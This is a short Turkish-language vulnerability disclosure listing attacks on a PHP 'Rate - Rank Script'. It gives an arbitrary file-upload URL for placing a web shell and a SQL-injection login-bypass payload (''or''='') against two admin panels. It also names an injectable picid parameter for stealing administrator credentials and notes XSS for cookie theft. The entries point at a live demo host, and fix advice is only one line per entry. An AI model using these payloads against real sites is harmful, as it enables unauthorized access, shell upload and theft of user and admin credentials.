Image Shell ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerability Type : Arbitrary File Upload Vulnerability

# Impact : Shell Atilarak Site Hacklenebilir

# Risk : Yüksek

# author : Bug Researchers | CWOmer


#############################################################

< ------------------- header data end ------------------- >

< -- bug code start -- >

http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/addSubImage.php?picid=269859

< -- bug code end -- >


Login Bypass 1 ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerability Type : Login Bypass

# Impact : Login Panelinde sifresiz giris yapilabilir

# Bug Fix Advice : Login Paneli Filtrelenmeli

# author : Bug Researchers | CWOmer

# Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Site_Admin/index.php

#############################################################

< ------------------- header data end ------------------- >


< -- bug code start -- >

username: ’or’’=’
password: ’or’’=’

< -- bug code end -- >

Login Bypass 2 ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerability Type : Login Bypass

# Impact : Login Panelinde sifresiz giris yapilabilir

# Bug Fix Advice : Login Paneli Filtrelenmeli

# author : Bug Researchers | CWOmer

# Script Demo : http://www.ezonescripts.com/productdemos/RateRank/Member_Admin/index.php

#############################################################

< ------------------- header data end ------------------- >


< -- bug code start -- >

username: ’or’’=’
password: ’or’’=’

< -- bug code end -- >

SQL Inj ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerability Type : SQL Injection

# Impact : Yönetici User Ve passleri çalinabilir

# Bug Fix Advice : picid degiskeni filtrelenmeli

# author : Bug Researchers | CWOmer


#############################################################

< ------------------- header data end ------------------- >



< -- bug code start -- >

RateRank/Site_Admin/member.php?picid=269859[SQL]

< -- bug code end -- >


XSS ;

< ------------------- header data start ------------------- >

#############################################################

# Application Name : Rate - Rank Script

# Vulnerability Type : Cross Site Scripting

# Impact : Yönetici ve User cookie'leri çekilebilir.

# Bug Fix Advice : Zararli karakterler filtrelenmelidir.

# author : Bug Researchers | CWOmer

#############################################################

< ------------------- header data end ------------------- >


< -- bug code start -- >

Inputlara XSS komutu girilmeli

< -- bug code end -- >